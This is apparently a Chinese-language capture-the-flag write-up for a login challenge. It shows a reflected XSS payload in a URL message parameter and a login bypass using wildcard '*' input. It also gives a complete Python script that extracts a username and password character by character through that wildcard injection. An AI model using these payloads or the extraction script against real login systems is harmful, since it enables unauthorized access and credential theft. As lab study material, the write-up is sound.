输入错误的用户名和密码,发现提示权限失败的message是通过url传输的,构造payload引起alert的弹窗

payload : http://178.62.5.61:31279/login?message=<img src=1 onerror=alert(123)>

但是还是需要登陆的,在登陆页面输入wildcards的''(用户名和密码均是).因为没有前面的过滤,直接把传递到后台,所以就能登陆进去了.

进行code review.发现请求了一个/search 的api,如果成功,就显示search后的结果(以table的方式)

发现关键还是在登陆位置,需要写脚本去遍历可能的用户名和用户名密码.我的脚本如下(最后完整版,包括密码的遍历):

import requests
from bs4 import BeautifulSoup

lab_address = 'http://{your-lab-id}/login'
alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
all_list = alphabet + ['{','}','1','2','3','4','5','6','7','8','9','0','-','_']

def login(username,password='',flag=0):
    """login page"""
    name = username
    pwd = password
    for _ in all_list:
        if flag == 1:
            pwd = password + _
        else:
            name = username + _
        response = requests.post(lab_address,data={'username':'{}*'.format(name),'password':'{}*'.format(pwd)})
        if('No search results.' in response.text):
            # print('\t return:{}'.format(_))
            return _
        
    return -1

def main():
    password = ""
    username = ""
    ifbreak = False
    flag = 0
    while(ifbreak is not True): #Test username
        res = login(username,password=password,flag=flag)
        # print('\tflag:{} res:{}'.format(flag,res))
        if res != -1 and flag == 0:
            username += res
        elif res == -1 and flag!=1:
            flag = 1
        elif res != -1 and flag == 1:
            password += res
        else:
            ifbreak = True
        print('\r[*]','Now auth is "{}:{}"'.format(username,password), end='', flush=True)

    

main()